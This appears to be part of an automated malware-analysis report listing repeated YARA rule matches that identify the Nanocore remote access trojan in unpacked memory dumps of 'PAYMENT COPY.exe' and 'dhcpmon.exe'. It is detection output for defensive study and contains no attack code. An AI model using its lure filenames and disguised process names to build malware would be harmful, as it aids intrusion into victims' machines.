    Source: 1.2.PAYMENT COPY.exe.366d53c.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.247b9ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.247b9ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.23bc994.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.23bc994.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.75e8a4.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.75e8a4.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.730000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.730000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.37b0e8f.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.37b0e8f.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.750000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.750000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.3.PAYMENT COPY.exe.387e041.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.3.PAYMENT COPY.exe.387e041.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.3.PAYMENT COPY.exe.387e041.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.24228c4.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.24228c4.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.3497815.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.3497815.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.660000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.660000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.34931ec.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.34931ec.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.6e0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6e0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.34931ec.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.34931ec.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.27bb8ec.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.27bb8ec.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.241667c.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.241667c.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.2.dhcpmon.exe.22bcc90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.22bcc90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.241667c.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.241667c.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.365ec98.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.365ec98.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
